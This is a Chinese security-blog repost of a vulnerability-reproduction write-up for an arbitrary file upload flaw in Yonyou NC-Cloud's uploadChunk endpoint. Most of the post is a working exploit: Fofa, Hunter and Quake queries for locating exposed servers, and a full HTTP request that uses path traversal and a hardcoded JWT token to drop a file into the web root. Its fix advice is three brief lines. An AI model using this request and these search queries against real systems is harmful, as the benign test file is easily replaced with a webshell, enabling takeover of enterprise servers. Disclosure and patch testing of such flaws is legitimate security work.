用友 NC-Cloud uploadChunk 任意文件上传漏洞

admin 2024年7月2日16:04:53评论7 views字数 1072阅读3分34秒阅读模式

产品简介

用友NC cloud,大型企业数字化平台,聚焦数字化管理、数字化经营、数字化商业,帮助大型集团企业实现人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。

漏洞描述

用友 NC-Cloud uploadChunk 接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。

网络空间测绘

Fofa

app="用友-NC-Cloud"

Hunter

web.icon=="b0cb782f31c4ca81c836c440681f59c9"

Quake

favicon: "10740c05d133c5508488f6cc90681bf9
用友 NC-Cloud uploadChunk 任意文件上传漏洞
img

漏洞复现

POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1
Host:127.0.0.1
User-Agent:Mozilla/5.0(Macintosh;IntelMac OS X 10_15_6)AppleWebKit/605.1.15(KHTML, like Gecko)Version/15.6Safari/605.1.15
Connection: close
Content-Length:152
Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9
accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Accept-Encoding: gzip, deflate, br


--024ff46f71634a1c9bf8ec5820c26fa9
Content-Disposition: form-data; name="file"; filename=".test.txt."

test
--024ff46f71634a1c9bf8ec5820c26fa9--
用友 NC-Cloud uploadChunk 任意文件上传漏洞
image.png

访问路径:/nccloud/.test.txt.

用友 NC-Cloud uploadChunk 任意文件上传漏洞
image.png

修复建议

1、如⾮必要,禁⽌公⽹访问该系统。 2、通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。 3、升级产品到最新版本

原文始发于微信公众号(凝聚力安全团队):【漏洞复现】用友 NC-Cloud uploadChunk 任意文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月2日16:04:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友 NC-Cloud uploadChunk 任意文件上传漏洞https://cn-sec.com/archives/2910117.html

发表评论

匿名网友 填写信息